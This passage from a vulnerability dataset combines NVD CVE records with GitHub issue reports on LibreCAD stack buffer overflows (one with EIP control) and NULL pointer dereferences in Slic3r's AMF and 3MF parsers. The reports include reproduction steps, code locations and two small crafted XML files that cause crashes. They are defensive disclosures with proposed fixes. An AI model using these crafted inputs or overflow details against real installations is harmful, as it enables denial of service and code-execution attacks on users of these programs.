"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "6B9DD625-CB16-4904-A4B0-7BA57A49531C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "79099DF5-DD78-4B2F-9B4A-A7FECBAF2AC9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/LibreCAD/LibreCAD/issues/1462 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreCAD",
"LibreCAD"
] | ### Vulnerable Products
* LibreCAD 2.2.0-rc3 and older
* Jw_cad 8.24a and older
### Steps to reproduce or sample file
1. Start LibreCAD 2.2.0-rc3 in a debugger
2. File/Open...
3. Unzip and open the attached [proof of concept file](https://github.com/LibreCAD/LibreCAD/files/7739792/jww_cdatamoji.zip)
4. Observe `ACCESS_VIOLATION` crash, with `eip=0x41414141` (AAAA)
Screenshot:

### Cause
The `CDataMoji` entity deserialization at `LibreCAD/libraries/jwwlib/src/jwwdoc.h` is vulnerable to
a stack buffer overflow.
`char buf[512]` declared in `CDataMoji::Serialize()` on [line 512](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L512)
is of fixed size 512. Some varieties of `CDataMoji` provide their own size, e.g. MojiData2 on [line 523](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L523)
and no bounds checking is performed. This allows an attacker to overflow `buf` and overwrite other stack variables,
including the return address.
The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present
in older versions and on other platforms.
### Impact
An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).
This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.
### Proposed Mitigation
1. Perform bounds checking in `CDataMoji::Serialize()`, and refuse to load the file if it would overflow `buf`.
2. Enable stack smashing protection in the windows build of LibreCAD.
### Operating System and LibreCAD version info
Version: 2.2.0-rc3
Compiler: GNU GCC 7.3.0
Compiled on: Nov 29 2021
Qt Version: 5.12.4
Boost Version: 1.65.1
System: Windows 10 (10.0) | Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataMoji) | https://api.github.com/repos/LibreCAD/LibreCAD/issues/1462/comments | 5 | 2021-12-18T19:01:27Z | 2022-01-25T12:03:26Z | https://github.com/LibreCAD/LibreCAD/issues/1462 | 1,083,924,119 | 1,462 | 3,096 |
CVE-2021-45342 | 2022-01-25T13:15:07.830 | A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1464"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1464"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:librecad:librecad:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66E49DA1-2E98-4159-BCA0-DD5EAAEF049A",
"versionEndExcluding": null,
"versionEndIncluding": "2.1.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:alpha:*:*:*:*:*:*",
"matchCriteriaId": "4C9E5468-D214-4130-BDAB-BE7721396A2F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "84591147-6A0D-4F5C-91F3-51DF9F64FCF5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "6B9DD625-CB16-4904-A4B0-7BA57A49531C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "79099DF5-DD78-4B2F-9B4A-A7FECBAF2AC9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/LibreCAD/LibreCAD/issues/1464 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreCAD",
"LibreCAD"
] | # Vulnerable Products
* LibreCAD 2.2.0-rc3 and older
### Steps to reproduce or sample file
1. Start LibreCAD 2.2.0 in a debugger
2. File/Open...
3. Unzip and open the [attached proof-of-concept file](https://github.com/LibreCAD/LibreCAD/files/7740065/jww_cdatalist.zip)
4. Observe `ACCESS_VIOLATION` crash, with `eip=0x41414141` (AAAA)
Screenshot:

### Cause
The `CDataList` entity deserialization in `LibreCAD/libraries/jwwlib/src/jwwdoc.h` is vulnerable to a stack buffer overflow. `char buf[512]` declared in `CDataList::Serialize()` on [line 784](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L784) is of fixed size 512. One variety of `CDataList` provides its own size field, as seen on [line 795](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L795) and no bounds checking is performed. This allows an attacker to overflow `buf` and overwrite other stack variables, including the return address.
The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present
in older versions and on other platforms.
**Note**: This is similar to, but distinct from issue #1462
### Impact
An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).
This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.
### Proposed Mitigation
1. Perform bounds checking in `CDataList::Serialize()`, and refuse to load more data to `buf` than actually supported.
2. Enable stack smashing protection in the windows build of LibreCAD.
### Operating System and LibreCAD version info
Version: 2.2.0-rc3
Compiler: GNU GCC 7.3.0
Compiled on: Nov 29 2021
Qt Version: 5.12.4
Boost Version: 1.65.1
System: Windows 10 (10.0) | Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList) | https://api.github.com/repos/LibreCAD/LibreCAD/issues/1464/comments | 2 | 2021-12-18T22:48:34Z | 2022-01-25T12:09:59Z | https://github.com/LibreCAD/LibreCAD/issues/1464 | 1,083,960,819 | 1,464 | 3,097 |
CVE-2021-45343 | 2022-01-25T13:15:07.873 | In LibreCAD 2.2.0, a NULL pointer dereference in the HATCH handling of libdxfrw allows an attacker to crash the application using a crafted DXF document. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1468"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1468"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E51FA84F-21D7-4AFA-871C-488EF10C2092",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/LibreCAD/LibreCAD/issues/1468 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"LibreCAD",
"LibreCAD"
] | ### Steps to reproduce or sample file
1. Unzip and load the [attached proof of concept file](https://github.com/LibreCAD/LibreCAD/files/7741210/dxf_hatch93.zip) in LibreCAD 2.2.0-rc3
### Cause
The `std::shared_ptr` `DRW_Hatch::loop` is written to when loading a `HATCH` entity with code 93. If this occurs before a code 92, the pointer is still `NULL`, leading to a crash.
### Impact
Denial of service.
### Proposed Mitigation
Ensure that `DRW_Hatch::loop` is not NULL before dereferencing at `drw_entities.cpp:1808`
### Operating System and LibreCAD version info
Version: 2.2.0-rc3
Compiler: GNU GCC 7.3.0
Compiled on: Nov 29 2021
Qt Version: 5.12.4
Boost Version: 1.65.1
System: Windows 10 (10.0) | NULL pointer dereference in DXF parser, HATCH code 93 | https://api.github.com/repos/LibreCAD/LibreCAD/issues/1468/comments | 2 | 2021-12-19T17:00:48Z | 2022-01-25T12:25:06Z | https://github.com/LibreCAD/LibreCAD/issues/1468 | 1,084,144,167 | 1,468 | 3,098 |
CVE-2021-45846 | 2022-01-25T14:15:08.807 | A flaw in the AMF parser of Slic3r libslic3r 1.3.0 allows an attacker to cause an application crash using a crafted AMF document, where a metadata tag lacks a "type" attribute. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5117"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/slic3r/Slic3r/issues/5117 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"slic3r",
"Slic3r"
] | ### Summary
A crafted AMF XML document can cause a crash due to a NULL pointer dereference during parsing.
### Vulnerable versions
* Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537)
### Step to reproduce
1. Create the proof-of-concept OBJ file (`nullptr_amf_metadata.amf.xml`):
```
<amf unit="millimeter">
<object id="0">
<metadata>dummy</metadata>
</object>
</amf>
```
2. Execute `slic3r --info nullptr_amf_metadata.amf.xml`
3. Observe segmentation fault.
### Example file
[nullptr_amf_metadata.amf.xml.zip](https://github.com/slic3r/Slic3r/files/7777329/nullptr_amf_metadata.amf.xml.zip)
### Cause
An attempt is made to read the `type` attribute of the `<metadata>` tag, at [AMF.cpp:189](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/AMF.cpp#L189). The PoC contains a `metadata` tag without a `type` attribute.
`get_attribute()` returns NULL, and thus the creation of the `std::string m_value[0]` crashes.
### Impact
Denial of Service.
### Proposed mitigation
Check for NULL before trying to construct the `std::string`, set a default value or reject the tag. Similar checks are already in place at [line 163](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/AMF.cpp#L163) and others. | NULL pointer dereference in AMF XML parser (metadata tag without type attribute) | https://api.github.com/repos/slic3r/Slic3r/issues/5117/comments | 2 | 2021-12-26T17:21:29Z | 2022-02-01T23:28:44Z | https://github.com/slic3r/Slic3r/issues/5117 | 1,088,812,181 | 5,117 | 3,099 |
CVE-2021-45847 | 2022-01-25T14:15:08.860 | Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/slic3r/Slic3r/issues/5118 | [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
] | github.com | [
"slic3r",
"Slic3r"
] | ### Summary
A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing.
### Vulnerable versions
* Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537)
### Step to reproduce
1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`):
```xml
<model>
<resources>
<object id="1">
<mesh>
<vertices>
<vertex />
</vertices>
</mesh>
</object>
</resources>
</model>
```
2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file:
```
3D/3dmodel.3dmodel
rels/.rels
[Content_Types].xml
```
3. Rename the zip archive to `nullptr_3mf_vertex.3mf`
4. Execute `slic3r --info nullptr_3mf_vertex.3mf`
5. Observe segmentation fault.
### Example file
[nullptr_3mf_vertex.zip](https://github.com/slic3r/Slic3r/files/7777535/nullptr_3mf_vertex.zip)
### Cause
`get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at [TMF.cpp:580](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L580) is ineffective, since `self->stop()` does not terminate the current function.
Execution continues to line 582, where `atof` receives a NULL pointer input, and a crash results.
### Impact
Denial of Service.
### Proposed mitigation
Throw an exception in `TMFParserContext::stop()` to ensure that file parsing stops immediately. | NULL pointer dereference in 3MF XML parser (vertex tag without x/y/z attribute) | https://api.github.com/repos/slic3r/Slic3r/issues/5118/comments | 2 | 2021-12-26T20:32:19Z | 2022-01-31T12:44:25Z | https://github.com/slic3r/Slic3r/issues/5118 | 1,088,840,391 | 5,118 | 3,100 |
CVE-2021-45847 | 2022-01-25T14:15:08.860 | Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
